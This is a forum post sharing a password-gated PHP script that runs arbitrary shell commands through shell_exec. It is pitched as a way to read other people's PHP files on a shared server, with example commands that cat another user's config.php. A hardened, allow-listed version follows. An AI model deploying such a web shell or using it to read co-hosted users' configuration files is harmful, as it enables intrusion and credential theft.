
Shell execution script

Just a really simple, somewhat pointless script that _can_ be used to view other people's PHP files (on the same server).

I'm sharing it to demonstrate a simple authentication method, highlighting PHP files, and using shell_exec.

Some useful Linux shell commands are:
ls /home/bob/public_html/
cat /home/bob/public_html/config.php

The script should work as is with the password "pass" (no quotes).
PHP:
<?php
// what is the password?
$pass = 'pass';
// cookie name - consider changing this to something that people won't suspect
$cookie_name = 'wjcookie';
// md5() the password. The cookie below carries this hash, so anyone who can read
// or capture the cookie can replay it for as long as it is valid.
$md5_pass = md5($pass);
// PHP_SELF echoes the request path, so escape it before putting it in HTML
$self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');

// checks to see if the cookie is set
if (!isset($_COOKIE[$cookie_name]))
{
	//if the cookie isn't set and the form hasn't been submitted: echo the form
	if (!isset($_POST['conf']))
	{
		echo "Password: <form action='{$self}' method='post'>
				<input type='password' name='password'><br />
				<input type='hidden' name='conf'>
				<input type='submit'>
				</form>";
		die();
	}
	//if the cookie isn't set and the form has been submitted: check to see if the passwords match
	else 
	{
		// strict comparison so PHP does not apply numeric type juggling to the strings
		if (isset($_POST['password']) && $_POST['password'] === $pass)
		{
			// must be sent before any output, otherwise the header cannot be set
			setcookie($cookie_name, $md5_pass, time()+3600, '/');
		}
		else 
		{
			die('Wrong password.');
		}
	}
}
// if the cookie is set but the passwords don't match, then die
if (isset($_COOKIE[$cookie_name]))
{
	if ($_COOKIE[$cookie_name] !== $md5_pass)
	{
		die("Invalid cookie information.");
	}
}
// if the passwords in the cookie match echo the form for the shell command
echo "<h2>Shell Execution Script</h2>
		<form method='post' action='{$self}'>
		<input type='text' name='input' size='90'><br />
		<input type='submit'>
		</form>
		<br />";
// die if the form hasn't been submitted
if (!isset($_POST['input']))
{
	die();
}
// get the output from the command that was executed (the input is passed to the
// shell unfiltered; that is the point of the script, so it must stay behind the password)
$output = shell_exec($_POST['input']);
// this checks to see if the file is PHP then highlights it.
// The "?" must be escaped: an unescaped "/<?php/" makes the "<" optional and matches any "php".
if (preg_match('/<\?php/i', (string) $output) || preg_match('/\.php/i', $_POST['input']))
{
	highlight_string((string) $output);
	die();
}
// command wasn't successful or produced nothing (shell_exec returns NULL on error)
if ($output === NULL || $output === '')
{
	die("No output.");
}
// if not PHP then it echos it out to the screen, escaped so command output cannot inject HTML
echo nl2br(htmlspecialchars($output, ENT_QUOTES, 'UTF-8'));
?>
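A hardened counterpart to the script above, added here as an example and not part of the original post. It keeps the same three pieces (a cookie-based login, PHP highlighting, shell_exec) but fixes the points a reviewer would raise: the cookie no longer contains the password's md5 (a replayable bearer value), the password is checked with password_verify against a stored hash, cookie and CSRF tokens are compared with hash_equals, and the command is restricted to an allow-list (ls, cat) on paths inside one directory instead of running raw input. Assumptions: PHP 7.3 or newer, HTTPS in front of the script, a writable directory outside the web root at the assumed path CONF_DIR holding the assumed files pass.hash and cookie.key, and /home/bob/public_html as the only tree commands may touch.

```php
<?php
// Hardened counterpart to the shell script above (added example, not the poster's code).
// Assumed: PHP >= 7.3, served over HTTPS, CONF_DIR is outside the web root and writable.
declare(strict_types=1);

const CONF_DIR  = __DIR__ . '/../private';       // assumption: not web-accessible
const COOKIE    = 'wjcookie';
const TOKEN_TTL = 3600;
const BASE_DIR  = '/home/bob/public_html';       // the only tree commands may read
const ALLOWED   = ['ls' => true, 'cat' => true]; // allow-list of commands

// Password hash, generated once offline with
//   php -r 'echo password_hash("pass", PASSWORD_DEFAULT), PHP_EOL;'
// and pasted into CONF_DIR/pass.hash (assumed file name).
$passHash = trim((string) @file_get_contents(CONF_DIR . '/pass.hash'));

// Per-install HMAC key for signing the login cookie, created on first run.
$keyFile = CONF_DIR . '/cookie.key';
if (!is_file($keyFile)) {
    file_put_contents($keyFile, bin2hex(random_bytes(32)), LOCK_EX);
    chmod($keyFile, 0600);
}
$key = trim((string) file_get_contents($keyFile));

// Cookie value is "<expiry>.<hmac>", so it carries no password material.
function issue_token(string $key): string {
    $exp = (string) (time() + TOKEN_TTL);
    return $exp . '.' . hash_hmac('sha256', $exp, $key);
}
function token_valid(string $tok, string $key): bool {
    $parts = explode('.', $tok, 2);
    if (count($parts) !== 2 || !ctype_digit($parts[0]) || (int) $parts[0] < time()) {
        return false;
    }
    return hash_equals(hash_hmac('sha256', $parts[0], $key), $parts[1]);
}

$self = htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8');
$tok  = (string) ($_COOKIE[COOKIE] ?? '');

if (!token_valid($tok, $key)) {
    if (isset($_POST['password']) && $passHash !== ''
        && password_verify((string) $_POST['password'], $passHash)) {
        $tok = issue_token($key);
        setcookie(COOKIE, $tok, [
            'expires' => time() + TOKEN_TTL, 'path' => '/',
            'secure' => true, 'httponly' => true, 'samesite' => 'Strict',
        ]);
    } else {
        echo "Password: <form action='$self' method='post'>
              <input type='password' name='password'><br />
              <input type='submit'></form>";
        die();
    }
}

// CSRF token bound to the login token, so a cross-site POST cannot run commands.
$csrf = hash_hmac('sha256', 'csrf:' . $tok, $key);

echo "<h2>Shell Execution Script</h2>
      <form method='post' action='$self'>
      <input type='text' name='input' size='90'>
      <input type='hidden' name='csrf' value='$csrf'><br />
      <input type='submit'></form><br />";

if (!isset($_POST['input'])) {
    die();
}
if (!hash_equals($csrf, (string) ($_POST['csrf'] ?? ''))) {
    die('Bad CSRF token.');
}

// Parse "cmd arg arg": the command must be allow-listed and every argument must
// resolve (symlinks included) to an existing path inside BASE_DIR.
$parts = preg_split('/\s+/', trim((string) $_POST['input']), -1, PREG_SPLIT_NO_EMPTY);
$cmd   = array_shift($parts) ?? '';
if (!array_key_exists($cmd, ALLOWED)) {
    die('Command not allowed.');
}
$paths = [];
foreach ($parts as $p) {
    $real = realpath($p);
    if ($real === false || ($real !== BASE_DIR && strpos($real, BASE_DIR . '/') !== 0)) {
        die('Path outside ' . htmlspecialchars(BASE_DIR) . '.');
    }
    $paths[] = $real;
}
$output = (string) shell_exec($cmd . ' ' . implode(' ', array_map('escapeshellarg', $paths)) . ' 2>&1');

// Highlight PHP source; "?" is escaped so the pattern really requires "<?php".
$last = $paths === [] ? '' : end($paths);
if (preg_match('/<\?php/i', $output) || preg_match('/\.php$/i', $last)) {
    highlight_string($output);
} elseif ($output === '') {
    echo 'No output.';
} else {
    echo nl2br(htmlspecialchars($output, ENT_QUOTES, 'UTF-8'));
}
```

The login cookie is stateless (expiry plus HMAC over it), so there is nothing to store server-side and the value is useless to an attacker who knows the password hash but not cookie.key; the trade-off is that a token cannot be revoked before it expires short of rotating the key. The path check uses realpath so that `../` and symlink tricks are resolved before the prefix comparison, and escapeshellarg is applied to the resolved path, not to the raw input.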
The views expressed on this page by users and staff are their own, not those of NamePros.